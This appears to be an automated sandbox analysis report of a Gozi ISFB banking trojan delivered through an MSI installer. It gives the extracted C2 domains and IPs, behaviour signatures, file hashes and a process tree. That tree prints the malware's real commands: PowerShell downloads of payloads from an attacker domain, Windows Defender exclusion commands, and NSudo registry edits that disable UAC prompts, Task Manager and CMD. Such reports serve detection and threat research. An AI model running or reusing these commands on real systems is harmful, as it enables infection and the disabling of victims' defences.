Analysis
-
max time kernel
178s -
max time network
211s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
30-09-2022 14:20
General
-
Target
https://65.108.20.187/download.php?file=download
Malware Config
Extracted
gozi_ifsb
4
trackingg-protectioon.cdn1.mozilla.net
45.8.158.104
188.127.224.114
weiqeqwns.com
wdeiqeqwns.com
weiqeqwens.com
weiqewqwns.com
iujdhsndjfks.com
-
base_path
/uploaded/
-
build
250246
-
exe_type
loader
-
extension
.pct
-
server_id
50
Signatures
-
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
-
Nirsoft 2 IoCs
-
Blocklisted process makes network request 8 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
-
Registers COM server for autorun 1 TTPs 3 IoCs
-
UPX packed file 8 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 37 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 44 IoCs
-
Modifies registry class 30 IoCs
-
Runs ping.exe 1 TTPs 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://65.108.20.187/download.php?file=download1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4972 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G3YCTSQY\install (10).msi"2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F82379DB729047B2A488570A83B4DB7B2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssBC3E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiBC2C.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrBC2D.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrBC2E.txt" -propSep " :<->: " -testPrefix "_testValue."3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\update.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://cloudupdatesss.com/r1z3r1/index/f69af5bc8498d0ebeb37b801d450c046/?servername=msi -OutFile requestadmin.bat5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://cloudupdatesss.com/r1z3r1/index/c003996958c731652178c7113ad768b7/?servername=msi -OutFile nircmd.exe5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c nircmd elevatecmd exec hide "requestadmin.bat"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\nircmd.exenircmd elevatecmd exec hide "requestadmin.bat"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\nircmd.exe"C:\Users\Admin\AppData\Roaming\nircmd.exe" exec hide "requestadmin.bat"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""requestadmin.bat""8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://cloudupdatesss.com/r1z3r1/index/a3874ddb552a5b45cade5a2700d15587/?servername=msi -OutFile runanddelete.bat9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://cloudupdatesss.com/r1z3r1/index/fa777fbbb8f055cb8bfcba6cb41c62e7/?servername=msi -OutFile scripttodo.ps19⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command "& './scripttodo.ps1'"9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" computersystem get domain10⤵
-
C:\Windows\SysWOW64\ARP.EXE"C:\Windows\system32\ARP.EXE" -a10⤵
-
C:\Users\Admin\AppData\Roaming\gpg4win-2.2.5.exe"C:\Users\Admin\AppData\Roaming\gpg4win-2.2.5.exe" /S10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\system32\regsvr32" /s "C:\Program Files (x86)\GNU\GnuPG\bin\gpgex.dll"11⤵
- Loads dropped DLL
-
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\GNU\GnuPG\bin\gpgex.dll"12⤵
- Registers COM server for autorun
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\GNU\GnuPG\gpg2.exe"C:\Program Files (x86)\GNU\GnuPG\gpg2.exe" --batch --yes --passphrase 105b -o C:\Users\Admin\AppData\Roaming\p9d2.exe -d C:\Users\Admin\AppData\Roaming\p9d2.exe.gpg10⤵
-
C:\Program Files (x86)\GNU\GnuPG\gpg2.exe"C:\Program Files (x86)\GNU\GnuPG\gpg2.exe" --batch --yes --passphrase 105b -o C:\Users\Admin\AppData\Roaming\p9d2f.exe -d C:\Users\Admin\AppData\Roaming\p9d2f.exe.gpg10⤵
-
C:\Program Files (x86)\GNU\GnuPG\gpg2.exe"C:\Program Files (x86)\GNU\GnuPG\gpg2.exe" --batch --yes --passphrase 105b -o C:\Users\Admin\AppData\Roaming\p9d2s.exe -d C:\Users\Admin\AppData\Roaming\p9d2s.exe.gpg10⤵
-
C:\Users\Admin\AppData\Roaming\p9d2.exe"C:\Users\Admin\AppData\Roaming\p9d2.exe"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"11⤵
-
C:\Users\Admin\AppData\Roaming\p9d2s.exe"C:\Users\Admin\AppData\Roaming\p9d2s.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\p9d2f.exe"C:\Users\Admin\AppData\Roaming\p9d2f.exe"10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\'9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming*'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\*'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\'9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming*'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\*'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -command "Add-MpPreference -ExclusionExtension ".ps1""9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".ps1""10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp*'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\*'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Windows*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Windows*'10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Windows\*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Windows\*'10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Windows'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Windows'10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp*'10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp\*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp\*'10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp'10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Windows*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Windows*'10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Windows\*'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Windows\*'10⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Windows'9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Windows'10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe -outfile Nsudo.exe9⤵
-
C:\Users\Admin\AppData\Roaming\Nsudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f9⤵
-
C:\Users\Admin\AppData\Roaming\Nsudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f9⤵
-
C:\Users\Admin\AppData\Roaming\Nsudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f9⤵
-
C:\Users\Admin\AppData\Roaming\Nsudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f9⤵
-
C:\Users\Admin\AppData\Roaming\Nsudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f9⤵
-
C:\Users\Admin\AppData\Roaming\Nsudo.exeNSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f9⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 205⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c nircmd elevatecmd exec hide "requestadmin.bat"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 205⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c nircmd elevatecmd exec hide "requestadmin.bat"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 205⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c nircmd elevatecmd exec hide "requestadmin.bat"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 205⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c nircmd elevatecmd exec hide "requestadmin.bat"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 205⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.execmd /c nircmd elevatecmd exec hide "requestadmin.bat"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 205⤵
- Runs ping.exe
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\'1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe"C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe" --service1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30069012ED3CF5DB92F9F4FC78D55E2D_16AA5B9B040CB195ADDB70661F18F3C5Filesize
1KB
MD5e2914495511791d3aeb5c8056e0d9bfc
SHA133a9fb477bbc55e6513f6282ede877f010387327
SHA2561726c3a63dce52a844dde22b1e9eb0cc56e35df4eee8059c9ff82fe1106e742b
SHA512ceebcfe954bf7af13c457248ed4deb3cd694f39ae6acbcbaf1e5a74b9bc97fdfb7e88919a1cc3bc71df5c91344ca228872d4991510a0f5cd2e849ce4e923da4a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776Filesize
471B
MD5b471dd02d20e38a6695cf3cdb539ce96
SHA1d5006f272254f2639c3b7cd53a4a623aee592ac5
SHA256b6f5d3c2883398ddf4f651161f90a7c85469e1f9d764de6f8481845951d1d149
SHA512a8f8e19635caacf0ba160c9f502514542c9e785070aea3976be688dba8e1bb8a8b0483c286484d619451d47e3f3236bc9f44177d0f8ccd0c5a064f7aa890cf58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B03113490075047F519A3F760F0FF379_8ABAEC9182C56FA0B29963ED675C25A2Filesize
2KB
MD5454f05b0c43698ded80a794395dc2d97
SHA1dced0389e844977ebc39f146602b4929c122893d
SHA2564d18890798710c7e70cc1619aeba1ff448fa988e27a1a3b1c4ceba7ba2b03bc4
SHA5124e61ae3cfc943bcb74026f37607f7fdeb34915494510c31259521d3e0b039196d2651a3614aac24f9fa0fddf01a03c918a05e91ef41923737855a498f48725e5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30069012ED3CF5DB92F9F4FC78D55E2D_16AA5B9B040CB195ADDB70661F18F3C5Filesize
412B
MD5817560d1a5c1e513b79b0d789a99f4c8
SHA1dc65d48d300e2df463103794c18f26fcf2605b69
SHA256ee587de3903e370f003272b92357b502026c67ac3e0aee044bd9b18d591b69c1
SHA512d03dd23b06487f2de94cadf2b244f0a9efffb3ced40483dc3a1052c81a1a8b2da14fe0672d0c476305b965c054b880efdac09d2d7b8883db2a569fbe67b2a168
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776Filesize
404B
MD577207a66b4ca015ac56e46d17723f0d3
SHA1aad3d7316386d5b358fc4043675dfe63ac93e23b
SHA25669989164846d91d7cb53c776def7c4fa128441b40b20fc6cc456f3df7ffdf856
SHA5122009090bb18bdba515046e873a10797215a5e0b1590261b8cef3873c0962da1b695ed1d1e897ba870d55fc58d1e3802eefa1ae3a979d68bb18beaacc46827d35
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B03113490075047F519A3F760F0FF379_8ABAEC9182C56FA0B29963ED675C25A2Filesize
428B
MD5d9d04dd3c1fd18c8bba106c2584ee0b2
SHA12e5a97ba5917d6159645656f07cde56923cb869d
SHA25667207c7a83d9b80b3a7a421e612b6a3071da362683a0d9544ccb38d35ac0e4e0
SHA512382677fd9694e5d8ecf582b64d7c5812e0a60b92674b8233a218d06e661301cdd433c7cf95d5cec58e62b0c1ca06892e7e5b9163462369742227977ed66419cc
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G3YCTSQY\install (10).msi.918mqcc.partialFilesize
108.2MB
MD5edf364a6d1f10a9ecdd70c6bdfabc069
SHA1031944ce51354fa50ebe1200fef997c338110622
SHA256873aee16ee7ad04a41096ba1b05e217ff749e427ffdd3271ee98081a960ca5be
SHA512b302eeb9e25d60768738c8c82fca9a5c0971ddc9e874eb0eda0c8c07903f70375eb1489ad87732bbf1779f3846eb92d8c63c475bab0b8d4690c9b05eaa961d21
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD56bfc486da4c807cc4b0f74ae2b9e749f
SHA167d18b4fcf39b28b4e61ffd233c8dc1b9f5b8619
SHA25638b74adbb7b43ffcdd0f4d26be90688488e5c20dc7ed219d77e2418eb1a6fc5c
SHA512b163070e33b6ce4100c55fddf5356e21c963df3c5fa92a1c08c8cc070992f1083d3bdace5fa12ed8ad8fcabd9cc5a1b5995172984868126d1795127f8fe570b8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5f147bbba44b9788f26f4b3ffc053db4c
SHA1c32171001490363abd43dd6965db3c1cf4fc825f
SHA2568314de15c22260ce0f9b643cc86dc4233dfca39fb485153ead0ea57339b13da8
SHA5129cfb3913140e4c8b61b0cda0c902c6251e8f48fa5d2af650e24388f39588e63739d8290e3edddd7459b8b4105344e7658bb0aa51d5ef8143df666d363edbad34
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5e9ef0951bf690a43d3732c700b56e87d
SHA1929187abf2d89c047c596c0b53cfdf49718222e5
SHA256ac86bd04467f59e744cb14bb83cb3a6a2265bedb32028eec9ba51521c99c49da
SHA5120efdaf6a0be9fee741a3e08ec572a2c4b7109912256ba3de758b661cc7c10c882c5eb6decd11da87930f37cc89c3bda829a2f2a339235c6c3ab92a5001608462
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD52ce1f8ad4973ee13b8755a98b5e5ee01
SHA17f7e1e554e08f798d935996441a1e81d2eabae5a
SHA256949737c4ba153db92e8ccdcca4234e6d8a75016be6797f8631a2a0d71a5b9f86
SHA512f6a5173b14da2ea160f37c0fd6112eeaf6d24c14ffab9d1d931ba5ec75ea3adbc7a8ded6575fcc6ec9b405bca3eca2ae40b8ed6445e943ff5e49596717d4b488
-
